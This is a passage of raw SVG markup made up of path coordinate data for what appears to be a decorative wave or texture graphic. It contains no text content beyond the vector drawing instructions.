-.3-.1-.2-1-.5-.2-.8,4.9-.6a24.64,24.64,0,0,0,3.7.8c.6-.3,3.2-.3,3.8-.6,1.8,0,.8.3,2.3.4,2.5-.3-.1-.4-2.3-.6a9.16,9.16,0,0,0-2.6-.4c-.1-.1-.2-.3-.3-.4,1.6,0,3.9.1,4.2,0-4.1-.1-5.7-.2-7.6-.4-.5-.3,3-.1,3-.3-1.3,0-1.3-.2-1.3-.4-2.5-.1-6.9-.6-6.3,0,2.5.2,3.8-.2,4.2.1.7.4-2.5.3-4,.4-2.9-.3.4-1-.9-1.3,0,.2-2.6.1-2.2-.2,3.2,0,3.3.3,6.4.2.6-.5-2.2-.7-2.8-1,1.4,0,1.4-.1,3.1,0,1.8.4-4.4-1.2-6.3-1.7h.4c2.4.3,1.8.5,3.3.8,2.1-.1,1.1-.4.1-.7,1.6.1,3.6.2,4.9.4,1.1.3-2.8.5.5.8-.4-.4,1.1-.6,3-.7.4.1.8.1,1.1.2,1.3.3,5.2.2,7.4.6-.8.2-7.4.7-4.8.7a8.21,8.21,0,0,1,2.1-.1c.1.1.1.1.1.2-.4,0-.7.1-.6.1h.5a3.36,3.36,0,0,1-.6.3c-.7-.1-1.5-.1-2.6-.2,1.7.7-4,.9.2,1.7h2.3a4,4,0,0,1,.5.1c0,.1.1.1.1.2-1.3.1-1.1-.1-3.7-.1-.7.3,1.8.3,3.9.3.9.7,2.7,1.3-1.4,1.6,4.5.4,2,1.2,7,1.6,0-.3.4-.6.4-.9.8-.1,1.5-.1,2.3-.2h-2.4c-.1-.2-.4-.3-1-.5a16.21,16.21,0,0,0,2.2-.2,8.1,8.1,0,0,0,2.2,0,2.08,2.08,0,0,1,.7.1c0-.2,2.5-.2,5.2-.1,1.2-.5.7-1.1,3-1.8-3.8-.1-1.8.5-6.1.3-.2-.1-.2-.1-.1-.1h.4a5.6,5.6,0,0,0,.7-.2,3.88,3.88,0,0,0,.9-.1h-.7a3.25,3.25,0,0,0-1.3-.3,23.14,23.14,0,0,1,3,.2c.3-.3,3-.8.3-1.1.1.3-1.7.3-2.8.5-7-1.2,7.3-1.1,12-1a11.71,11.71,0,0,1,3.8-.6c4.6.1,1.8.9,6.9.9,1.2-.2-4.4-.4-1.3-.5a12.28,12.28,0,0,0,2.9.2,4.76,4.76,0,0,0,.7.3h-.1c-.1.2.5.3,1.5.3.6.1,1.4.3,2.1.4-.4-.1-.5-.2-.4-.3,2.7.1,6.1.1,6.8.4-.6.1-1.9.5,1.4.6,2.9.1-1.4-.6,2.9-.4,1.8,0,.8.3,2.4.4.7-.3,2.8.2,5.3.1.2-.3-.8-.7,3.8-.7-5.8-.1-3.6-.4-7.5-.2a15.33,15.33,0,0,1,5.1-.2c-1.2-1.1,1.3-1.8-.8-2.7,3.2-.1,4.3-.4,8.1-.4,2.5,0,1.6.3,2.8.5-.4.1-.6.1-.9.2a3.7,3.7,0,0,1,1.1-.1h.5a12.27,12.27,0,0,1,2.1,0,2,2,0,0,1,.9-.2c1.5,0,3.3,0,5.4.2-3.6-.3-2.1-.4-1-.6-1.2.5,4.7.4,5.3,1a16.09,16.09,0,0,0-2.5.1,12.35,12.35,0,0,0-1.7-.3c1.2.5-5.7.7-1.9,1a24.26,24.26,0,0,0,3.3-.2,9.78,9.78,0,0,0,1.3.3c3.1-.3,0-.9,4.7-.9-.3.3-.1.8,3.8,1-.3-.6,3.4-.7,5.6-1,.9.2-5.2,1.5-.9,1.8,1.9-.7,6-.9,12-1,1.3-.3-3.3-.6-.4-.7-.4.5,5.4-.2,1.8-.4.3.3-5.3.1-5.4-.2a45.71,45.71,0,0,0,7.4,0c-.3-.8-1.3-1.4-4.4-1.9.7.3-1.5.4-.1.6.1,0,.1.1.2.1-4.1.2-7.2,0-9.8.4-1-.5-.1-.5-2.6-.8,2.3,0,3.6.4,3.1,0-5-.4-2.8-1,.2-1.3a31.61,31.61,0,0,1-5.2-1.7h1.3a3.54,3.54,0,0,1-1.2-.7,21.48,21.48,0,0,1,3.4-.2c-.1-.2-.7-.3-1.3-.4-1.2-.4-.4.1-2.2.1a.68.68,0,0,1,.5-.4c1.5-.1,2.7-.2,1.3-.3a.87.87,0,0,1-.5-.1,53,53,0,0,1,5.4-1.3c-6.7-.2-4.6.5-9.1.5-.2-.1-.5-.2-.7-.3,1.9-.1,1.8-.3,1.1-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.3-.6.9-.9-2.2-1.2.2,0,.3-.1.5-.1,1,.1,2.4.1,3.8.1-1.3.1-2.6.5.9.6-.5-.3,4.1,0,2.9-.4-.3-.1-1.2-.1-2.1-.2a9.89,9.89,0,0,1,2.3.2c.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c1.7.1,2.7.1,3.5.1-.4.2-2,.3-4.9.1.3.3,4.8.9,5.5.4-5.2-.3,1.6-.1,2-.2-1.8,0-1.1-.2-1.2-.3a20.13,20.13,0,0,1,2.2.1c-1.5-.4-1.8-.8-1.6-1.1a23.62,23.62,0,0,1,4.2.4c-.2.1-.3.3-.4.4a15,15,0,0,0-2.5.2h2.7c.1,0,.2.1.3.1-.2,0-.2-.1-.3-.1,2.5,0,2.8.2.5.2,5,.1.8.5,4.5.5,2-.5-3.3-.7-.7-1.1,4.8.7,2.1,1.4,10.7,1.9.3.4.2.6-.2.8h-.2a10.52,10.52,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3-3.3-.1-1.8-.4-1.1-.7.8.2.7.6,1.4.7,4.3.2,3-.3,7.3-.1-.6-.2-2.7-.6.4-.6.1.1.3.1.7.2,1.2.5-.8.9,1.6,1.4,1.4-.2,4.1.5,5.7.7a12.27,12.27,0,0,1,2.1,0c.3-.2,2.1-.3,2.8-.5,1.7.5,2.4-.1,5.2,0,1.8.1.1.5,3.5.5.9-.2,3.1-.8-.6-.9-.1.6-7.2-.1-9.7-.4,5.2-.2-.3-1.2,7.6-1.3-1.5-.1-3.3-.2-4.5-.4,1.5-.5,2.8-.8,8.2-.4-.4-.3,1.4-.3,2.9-.4,1.2.2,1.7.9-1.5.8.3.3,2.2.4.4.6,2,.2,4.4.4,6.7.6-1.8.5,2,.6.7,1,1.9,0,3.8.1,5.7.1.4.2-1.8.2-2.6.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5a11.33,11.33,0,0,1,2.6.3v.1c-.1,0-.2.1-.4.1h-1.7c1.8.5-2.8.2-1.8.5a26.2,26.2,0,0,0,2.8.1c1.9.1,2.1,0,2-.1.5,0,1-.1,1.3-.1a6.42,6.42,0,0,1-1.8-.2.3.3,0,0,0,.2-.1c.4,0,.9.1,1.5.1h.1c.7.1,2.3.1,2.7.2,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0c-3.2,0-1.9-.4-4.5-.4-.4.2-.1.5-3.9.3-1.3-.5-1.1-.9,0-1.2a50.79,50.79,0,0,1,7.8.2c-.5-.3.1-.5,2.9-.4.1-.2-1.4-.3-1.4-.5h4.2c.9.4,5.3.5,10,.9a7.88,7.88,0,0,1,2-.1c-3.2-.5,3.2-.4-1.6-.8a73.05,73.05,0,0,1,8.5.2c-1.3.1-1.1.4,1.4.5-.6-.4-1-.8-5-1.2a8.17,8.17,0,0,0,1.3-.2c1.6.1,3.4.1,4.9.2-.2.3,3,.2,2.5.6-.6,0-1.1.1.1.1,0-.1.1-.1,1-.1.3.1.2.2,1.2.2-1-.4,1.6-.3.6-.6-2,0-3.4-.1-4.6-.2,2.2,0,3.8,0,3.4-.2h-4.2c1.5-.2,1.2-.4-.6-.7,4.3.2,2.4-.6,6.2-.2.8-.4-4.8-.2-4.5-.5a7.35,7.35,0,0,0,2.4-.5h.5a8.34,8.34,0,0,1,1.8-.2c1.6,0,3.5,0,3.5-.2a21.47,21.47,0,0,1-3-.3c.4.2.3.3-.4.3a13.35,13.35,0,0,1-2,0h0c.1-.2,0-.5-.4-.7.8,0,1.7.1,2.5.1,5.8.2,10.1.4,8,1-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.5.7-1,1.1-2.1,1.8-.5.3-.9.6-1,1.1h.9c2.7.1,4.2-.2,4.8.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7a34.87,34.87,0,0,1-5,.3h-1.7c.5,0,1.1.1,1.7.1,1.9.1,4.1.2,5.5.3.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a45.25,45.25,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2a60.26,60.26,0,0,1,11.1,1.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.43,31.43,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0c3.1,1.1,11.6,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4-5.2,0-6.4-.3-6.2-.7,8.4.2,2.8-1.4,13.3-.7-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-6.7-.7-2.8-2.7-10.1-3.6,2.6,0,4.7,0,5.5-.1-3.4-.1-4.1-.5-7.5-.6,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.88,97.88,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.9-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.19,66.19,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7a68.57,68.57,0,0,0,7.7.8c5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1-2,.4-8.3.3-4.8.9-1.6-.4,3.6,0,4.2.1a5.61,5.61,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.43,31.43,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a26.88,26.88,0,0,1-3.1-.3,17.67,17.67,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.15,41.15,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.07,9.07,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.08,31.08,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a3.93,3.93,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.8.2,1.9.3.4.4,11.2.3.2-1.1,0-1.6s10.4,0,9.1-.7a35.62,35.62,0,0,0-4,.1c-2.2-.5-5.6-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.2-.3-6.2-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.6,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-4.54-1.69,4.66-1.79-7-1.1-4-2.51.24-3.41V0Z\"></path>\n        <path d=\"M1739.6,46.7c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A94.06,94.06,0,0,1,1739.6,46.7Z\"></path>\n        <path d=\"M1838.7,75.8c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C1836.6,75.8,1837.7,75.8,1838.7,75.8Z\"></path>\n        <path d=\"M1862.2,72.5c-2.3.1-8.6.3-5,.7C1856,72.7,1864.7,73.1,1862.2,72.5Z\"></path>\n        <path d=\"M1718.3,65.2c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4H1718c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.1.4.3,1.1-5,1.1h-2.4c1.2,0,2,.1,2.4.1.7.1.5.1,0,.1-1,.1-3.4.2-3.4.3,1.6.1,2.7.1,3.4.2,3,.3-.8.9,2.3,1.4h-2.3c-1.8,0-1.2.2,0,.4l1.6.3a7.82,7.82,0,0,1-1.6-.1c-4.9-.1-3,.4-6.4.4a35.32,35.32,0,0,1,6.4.7c1.3.3,1,.5,0,.8-1.7.4-5.2.7-6.7.9,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8a32.58,32.58,0,0,1,4.3.4c.2,0,.4.1.4.2s-.2.1-.4.1a23.8,23.8,0,0,1-4.3.3c1.2.1-1.7.7,1.3.5,1.1-.1,2.1-.2,3-.2,4.4,0,4.4,1.6-.1,2.1a29.32,29.32,0,0,1-5.3.1c.8.2,3.7.4,5.3.5a3.78,3.78,0,0,1,1,.2,3.07,3.07,0,0,0-1,.1,44.23,44.23,0,0,1-6.9.5c.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0h0c1.7.3,4.7.7.6.8-.2,0-.4-.1-.7-.1a22.83,22.83,0,0,0-6.6-.3c3.7.3.7,1.2-.3,1.2,1.5.3,4.4.1,6.9.2h.2c.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-1-.1-1.8-.2-2.6-.3-1.1-.2-2.1-.3-3.7-.5,3.1.5-2.2.5.9,1,1.1.1,2,.1,2.8.1a10.84,10.84,0,0,1,2.9.1c-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C1711,66,1709.7,65.1,1718.3,65.2Z\"></path>\n        <path d=\"M1860.5,67.3c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C1864.6,66.8,1858.1,67.1,1860.5,67.3Z\"></path>\n        <path d=\"M1873,68.9c2.9-.1,4.8-.3,6.5-.5C1873.4,68.2,1871.4,68.8,1873,68.9Z\"></path>\n        <path d=\"M1728.4,62.5c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C1737.4,64.2,1726.8,63,1728.4,62.5Z\"></path>\n        <path d=\"M1744.4,63.3c-1.8,0-7.3,1.1-1.9,1C1739.6,64.1,1745.3,63.7,1744.4,63.3Z\"></path>\n        <path d=\"M1778.9,63c.4.5-8.9,2.1,1.6,1.8C1782.1,64.2,1783.4,63.8,1778.9,63Z\"></path>\n        <path d=\"M1774.7,62.9c-.4-.4-5.4-.5-7.7-.8C1762.9,61.6,1769.6,62.9,1774.7,62.9Z\"></path>\n        <path d=\"M1855.3,63.1c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C1852.1,62.4,1857.9,62.7,1855.3,63.1Z\"></path>\n        <path d=\"M1816.5,60c4.4.2,2.5-.2,6.9-.1l-.3-.3C1819.3,59.6,1819.2,59.9,1816.5,60Z\"></path>\n        <path d=\"M1840.9,48.4C1849.2,48,1837,46.9,1840.9,48.4Z\"></path>\n        <path d=\"M1814.7,45.4c-.9.6,2.7,1.4,6.9,1.6C1817.5,46.5,1819.8,45.7,1814.7,45.4Z\"></path>\n        <path d=\"M1737.3,44.2c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C1733.3,43.7,1739.7,43.9,1737.3,44.2Z\"></path>\n        <path d=\"M1750.7,43.6c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C1744.4,43.5,1753.1,44.1,1750.7,43.6Z\"></path>\n        <path d=\"M1780.6,44.5c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C1782.1,44,1777,44.2,1780.6,44.5Z\"></path>\n        <path d=\"M1707,96.5c-4.4-.2-2.5.2-6.9.1-1.5-.4,1.7-.4.7-.7-.6-.1-6-.6-7.2-.3,4.8.3.4.7.9,1a32.42,32.42,0,0,1,4.4.3C1699,96.5,1709.4,97.3,1707,96.5Z\"></path>\n        <path d=\"M686.9,114.8c-2.8.2.1.2.4.4C688.4,116.2,691.2,115,686.9,114.8Z\"></path>\n        <path d=\"M528.3,98.8c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C522,98.7,530,99.2,528.3,98.8Z\"></path>\n        <path d=\"M731.3,102.1c.1.2,1.4.3,3.2.4-1.4-.4,5.6,0,3.8-.5C733.7,101.9,735.7,102.3,731.3,102.1Z\"></path>\n        <path d=\"M637.4,96.4c1.8,0,2.1.2,4.4.2-.6-.2,1.7-.2,2.5-.3A37,37,0,0,0,637.4,96.4Z\"></path>\n        <path d=\"M575.1,93.5c3.6-.1,3.2-.7-2.2-.9C574.5,92.9,571.4,93.2,575.1,93.5Z\"></path>\n        <path d=\"M530.4,91.7a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C528.1,91.9,531.2,92,530.4,91.7Z\"></path>\n        <path d=\"M518.1,90.3c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C522.5,90.4,521.2,90.4,518.1,90.3Z\"></path>\n        <path d=\"M529.3,87.2c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.09,41.09,0,0,1,529.3,87.2Z\"></path>\n        <path d=\"M661.7,87.7c1,.3,1.7.6,6.2.7C667.9,88,665.7,87.8,661.7,87.7Z\"></path>\n        <path d=\"M593.9,80.2c-5.8-.1,1.1-.3-4.5-.4.4.4,1.3.7,3.6,1C592.2,80.4,595.4,80.5,593.9,80.2Z\"></path>\n        <path d=\"M525,77.6c-1.6.1-5.2.1-7,0C517.4,78.2,529.5,77.9,525,77.6Z\"></path>\n        <path d=\"M745.9,79.3c-.5.2-2.8.6,2.1.8C747,79.9,749.2,79.4,745.9,79.3Z\"></path>\n        <path d=\"M661,77.4c-1.2-.3-1.2-.7-3.6-1C655.2,76.6,656.4,77.3,661,77.4Z\"></path>\n        <path d=\"M660.4,73.6c2.5-.3,3.6.5,5.7.1-4.9-.6-.6-1.7-4.4-1.8-2.1,1.4-12.4,3.2-5.6,4.7C662.2,75.9,668.4,75,660.4,73.6Z\"></path>\n        <path d=\"M636.6,73.4c-6.1-.2-4.3.5.5.6C636.9,73.7,636.7,73.6,636.6,73.4Z\"></path>\n        <path d=\"M601.8,71.7c1.4,0,2.8.1,4.3.1l-.4-.4C601.9,71.2,602.2,71.5,601.8,71.7Z\"></path>\n        <path d=\"M749.9,68.1c-5.8-.1-3.6.5-.7.7C749,68.5,748.1,68.2,749.9,68.1Z\"></path>\n        <path d=\"M593.6,64c-.9-.2,1.2-.5-1.9-.6.5.2-.8.3-4,.2.9.2-1.2.5,1.9.6C588.6,63.9,590.9,63.7,593.6,64Z\"></path>\n        <path d=\"M610.1,62.3c-1.6-.4-1.6-.4-.6-.7a23.82,23.82,0,0,1-2.8-.1c-.9,0-1.7,0-1.3.1,4.1.2.6.5-.9.5C608.3,62.2,607.5,62.4,610.1,62.3Z\"></path>\n        <path d=\"M749.3,64.2c-.2-.4-.8-.8-3.7-1.1C747,63.7,745.2,64,749.3,64.2Z\"></path>\n        <path d=\"M597.7,57.7c-.4.2-2.8.2-2.4.5C598.9,58.2,602.8,57.8,597.7,57.7Z\"></path>\n        <path d=\"M601.8,57.5c-5.3-.5,2.2-.4-3.4-.7-1.4.2-1.3.5-2.1.7C598.9,57.6,599.2,57.5,601.8,57.5Z\"></path>\n        <path d=\"M748.1,59.7c-2.1.3,1.2.5.9,1C751.3,60.7,750.6,59.9,748.1,59.7Z\"></path>\n        <path d=\"M599.7,56.7c1.8-.1,1.9-.6-2-.7C598.6,56.2,596.5,56.6,599.7,56.7Z\"></path>\n        <path d=\"M727.2,56.4c-3.8-.1-4.5,0-3.9.3,2,0,3.2.1,4.4.2C727.3,56.7,724.7,56.6,727.2,56.4Z\"></path>\n        <path d=\"M737.8,55.9c1.9,0,3.2.1,4.4.2,0-.3-.9-.6-3.4-.7C739.4,55.6,738.9,55.8,737.8,55.9Z\"></path>\n        <path d=\"M869.9,52.8c1.3.4-2.2.3-.8.6,3.3.1,5.4.1,7,0C876.1,53.1,873.9,52.9,869.9,52.8Z\"></path>\n        <path d=\"M626,40.8c-3.5-.1-4.8.4-2.3.5C625.1,41.2,627.5,41.2,626,40.8Z\"></path>\n        <path d=\"M647.7,38.7c-3.6.1-2.1.7,2.2.9C647.5,39.2,649.9,38.9,647.7,38.7Z\"></path>\n        <path d=\"M639,35.1a4,4,0,0,0-1.6-.3c.2.2.3.4.5.6,3.7.2,6-.2,2.4-.4C640.3,35.1,640.2,35.2,639,35.1Z\"></path>\n        <path 